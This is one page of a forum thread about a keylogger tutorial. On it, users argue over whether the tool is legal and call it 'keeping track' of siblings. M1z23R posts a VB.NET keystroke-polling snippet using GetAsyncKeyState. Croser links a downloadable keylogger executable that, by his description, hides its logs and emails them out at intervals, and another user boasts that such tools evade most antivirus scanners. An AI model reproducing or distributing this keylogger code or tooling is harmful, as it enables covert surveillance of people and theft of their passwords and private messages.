How to make a Key Spy (Computer Spy/Keylogger)

Heres your chance to share your own tutorials with the community. Just post them on here. If your lucky they may even be posted on the main site.
37 posts Page 3 of 4
User avatar
Agust1337
Coding God
Coding God
Posts: 2456
Joined: Fri Feb 19, 2010 8:18 pm

@Mandai,
I know what a keylogger is I am asking why are you guys making one.
Top-notch casual Dating
User avatar
Proprogrammer
VIP - Donator
VIP - Donator
Posts: 415
Joined: Sun Oct 03, 2010 11:14 pm

Isnt this illegal on this site? come on this is a hacking tool and noone is getting on his ass about it? What are the rules you cant give out virus's, is it ok to give out how to make a virus? Cause this is one. Respond and tell me.
------------------------------------------------------------------------------
Proprogrammer, not just a Programmer.
User avatar
Usman55
VIP - Site Partner
VIP - Site Partner
Posts: 2821
Joined: Thu Dec 24, 2009 7:52 pm

It isn't a keylogger or a virus, or neither is it illegal. It is a software to keep tract of someone like your younger brother or sister.
Image
User avatar
M1z23R
VIP - Donator
VIP - Donator
Posts: 622
Joined: Tue Sep 28, 2010 4:55 pm

This is very,very,very bad keylogger ... you set the timer interval too high ! '-.- it is always adding more then 3 letters even if you press one !
If i press just one time "J" it adds - "JJJJJJ" and not just "J" ;) i think you get me '-.- i wasted 3 credits lol !
User avatar
Usman55
VIP - Site Partner
VIP - Site Partner
Posts: 2821
Joined: Thu Dec 24, 2009 7:52 pm

M1z23R wrote:
This is very,very,very bad keylogger ... you set the timer interval too high ! '-.- it is always adding more then 3 letters even if you press one !
If i press just one time "J" it adds - "JJJJJJ" and not just "J" ;) i think you get me '-.- i wasted 3 credits lol !
Don't be angry. I'll send you the updated one (when I create it lol). I'll ask mandai for help. He's a boss in such things.

EDIT: I just updated the tutorial and source code. It now works completely without any bugs. But still you have to create the text file before opening the file. Thanks to mandai for the code.
Image
User avatar
M1z23R
VIP - Donator
VIP - Donator
Posts: 622
Joined: Tue Sep 28, 2010 4:55 pm

You could declare
Code: Select all
Event vKeyDown(byval vKey as Keys)
Private sub vkeydownhandle (byval vkey as keys)
if e.keycode = keys.A then msgbox("A Pressed")
End sub
Private sub timer1tick (byval sender as object,byval e as eventargs) handles Timer1.tick
Dim key As String = ""
        For i As Integer = 0 To keyNames.Length - 1
            Dim result As Short = GetAsyncKeyState(keyValues(i))
            If result = -32768 And Not isdown(i) Then
raiseevent vkeydown(keyvalues(i))
                isdown(i) = True
                key += keyNames(i) & " "
            ElseIf result = 0 Then
                isdown(i) = False
            End If
        Next
        'TextBox1.Text += key
End sub


Sorry for bump but i was looking at my rep points and thought about changing the code. Btw i was't trying to be disresoectful :)
User avatar
Usman55
VIP - Site Partner
VIP - Site Partner
Posts: 2821
Joined: Thu Dec 24, 2009 7:52 pm

Bump is not a problem. I've not programmed anything for a while now and am finding a way of getting started. However, I am not in the mood so I'll simply add a link to your post in my tutorial. Thanks.
Image
User avatar
hunnuke
Just Registered
Just Registered
Posts: 3
Joined: Thu Oct 21, 2010 4:29 pm

More ADV. Pro cooll;
User avatar
Croser
Just Registered
Just Registered
Posts: 3
Joined: Mon Jun 18, 2012 12:04 am

Hey people,
as I read trough these posts I noticed alot of complaining about the key capturing and stuff so I registered to share my own keylogger with you, its just a simple keylogger that can : Capture key strokes (obviously)
Save them into a user predefined folder under changed file extension so not everyone can open it.
Send saved loggs to an email in user defined intervals.

There is no need to create any folders or files before runnign the program, it will create all nessesary folders itself.

so if you are interested go ahead and check it out, give me some feedback.

NOTE: I am NOT posting a source code, I am posting finished .exe so SCAN before you open it.
NOTE2. Read the EAT ME.txt before replying to this post.

http://croser.borec.cz/The_Hell_Logger.rar
Image
User avatar
clanc789
Coding Guru
Coding Guru
Posts: 786
Joined: Tue Nov 02, 2010 4:45 pm

So Croser give us 1 reason to trust the keylogger? A virus scan means nothing wiht most home-made programs: I made my own keylogger and it was only detected by 2/42 scanners.
Practice makes perfect!

VIP since: 6-10-2011
37 posts Page 3 of 4
Return to “Tutorials”